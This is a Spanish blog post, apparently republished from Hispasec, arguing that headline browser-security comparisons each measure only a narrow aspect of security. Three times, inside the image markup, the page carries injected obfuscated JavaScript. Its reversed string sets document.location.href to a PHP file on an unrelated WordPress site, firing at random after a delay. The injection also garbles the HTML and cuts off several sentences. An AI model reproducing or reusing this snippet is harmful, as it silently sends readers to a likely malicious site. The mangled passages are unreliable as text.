Reflexiones sobre la seguridad en navegadores: ¿sirven o no las comparativas?
Estamos en la era de la guerra entre navegadores. El concepto de “la
nube” pasa por una huida del disco duro hacia Internet, y esto hace que
los navegadores cobren especial importancia. Leemos titulares sobre cuál
es más seguro, pero pocos informes completos o información sobre la
metodología empleada. ¿Cómo valorar realmente la seguridad de un
navegador?
Ejemplos
No hace mucho, la compañía NSS Labs realizó un estudio sobre los
diferentes navegadores más populares. Internet Explorer aparecía en el
titular como el “más seguro”. Como es de esperar ante estas afirmaciones
que contradicen una especie de axioma popular establecido, se pone en
duda el estudio y se le tacha de parcial. En este caso hay indicios de
que está “patrocinado” pero no es lo más importante. Realizaron unas
pruebas que medían la capacidad de reacción de los navegadores ante
amenazas de malware por ingeniería social. O sea, la capacidad del
navegador de detectar automáticamente que están intentando engañar al
usuario e impedir, por ejemplo, que visite un sitio donde se aloja
malware y descargarlo. Esto es solo una pequeña parte de lo que se debe
considerar “seguridad” del navegador. Es más, para los usuarios más
avispados, esta opción es poco útil porque por experiencia sabrán quién
o qué intenta engañarlos. No necesitan que les avise el navegador.
Además, si se quiere hilar más fino, en el informe del NSS se puede
cuestionar el tipo de muestras escogidas para realizar el estudio.
Otro ejemplo. En octubre de 2010 en Hispasec publicamos un informe muy
simple: puesto que disponemos del comprobador de URLs fraudulentas en
virustotal.com, comparamos qué navegador detecta más URLs como tal.
Resultó ganador Firefox y así rezó el titular “Firefox el navegador más
seguro contra el fraude”. De nuevo, para corroborar otra especie de
axioma popular, el titular fue mutilado por otras webs: “Firefox es el
navegador más seguro”. En realidad, sólo se comprobaba otra pequeña
parte de la seguridad de un navegador. Sería como afirmar que un
utilitario es “más seguro” en general que un coche blindado porque su
alarma antirrobo es más sensible.
¿Qué medir?
Estudiar la seguridad global de un navegador es complicado. Uno de los
estudios recientes más completos en este sentido (y aun así no se
midieron todos los factores) fue realizado por Informatica64 en abril
de 2010. Se estudiaban tanto las opciones de seguridad, como sus
protecciones y las vulnerabilidades. Pero incluso en este informe, es
discutible la metodología seguida para el cálculo de vulnerabilidades.
Se tomaron en cuenta varias versiones de otros navegadores (y no sólo
la última) mientras que de Internet Explorer sólo se hablaba de su más
reciente versión por entonces, la 8 (y no la 6, que todavía es soportada
y resulta un desastre en seguridad). Esta es una de sus gráficas
comparativas.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/noticias/navegadores3.png” alt=”” width=”837″ height=”419″ /></p>
<p> </p>
<p>No hace mucho, IntecoCert publicó otro estudio de vulnerabilidades en<br />
el primer semestre de 2011. Este está basado en el NIST y en el número<br />
de vulnerabilidades exclusivamente. Podríamos decir que ambas<br />
organizaciones son bastante “neutras”. Observamos cómo el número de<br />
fallos de Chrome es muy superior al res<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/noticias/navegadores2.png” alt=”” width=”861″ height=”472″ /><br />
<img decoding=)
todos preventivos y
mitigadores que utiliza Chrome (MIC, ASLR, DEP, las actualizaciones
automáticas en las que es único en su especie), esas vulnerabilidades,
aunque bastante más numerosas, son mucho más complejas de explotar.
Siguiendo con la comparación con los coches, Chrome viene “blindado” de
serie en Windows: aunque le disparen, es complicado que la bala llegue
al conductor. Lo curioso es que también Internet Explorer 9 (que es un
gran navegador) implementa muy acertadamente algunas de estas medidas de
seguridad. El problema es que la forma en la que maneja los plugins y la
actualización mensual (a menos que una amenaza sea lo suficientemente
peligrosa como para romper el ciclo), hacen que sea más fácil aprovechar
las vulnerabilidades que sufre, independientemente de su número.
También podemos hablar de la velocidad de parcheo. En este caso, tal y
como publicamos en otro estudio en Hispasec, quizás Mozilla sea la
solución para quien busca esa rapidez. De nuevo, si se calificara a un
navegador como “el más seguro” sólo por esta característica, sería como
afirmar que un turismo es más seguro que otro sólo porque su reparación
lleva menos días.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torio/images/noticias/mediavulns.png” alt=”” width=”1082″ height=”718″ /></p>
<p> </p>
<p>¿Cuál es la verdad en<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tonces?
Pues, tal y como respondemos cuando nos preguntan cuál es el mejor
antivirus, aconsejamos el que más convenga al interesado. Sería erróneo
apostar simplemente por el que “más malware detecta” sin tener en cuenta
todos los factores como, tipo de muestras utilizadas, capacidad de
reacción, coste, sencillez, consumo de recursos, etc. Como los
antivirus, los navegadores son ahora software muy complejo y las
comparativas requieren rigor e imparcialidad. Los informes suelen mirar
el problema desde un ángulo concreto y es trabajo del lector procesar
toda esa información para tomar sus decisiones. El error que creo más
común es confundir un navegador “seguro” con un navegador “que protege”.
Son dos cualidades diferentes.
En resumen, el mejor navegador es el que más cómodo haga sentir al
usuario en cuestión de seguridad. Pero siendo prácticos, la realidad
es que el navegador más seguro es el que proteja de raíz contra los
peligros considerados más graves. Y estos son a nuestro juicio las
vulnerabilidades que se pueden aprovechar para ejecutar código y que
aparecen en forma de 0-day (o sea, se descubren mientras los atacantes
las están aprovechando y cuando aún no existe parche). Y esto, por
popularidad, deja en muy mal lugar a Internet Explorer hoy en día.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.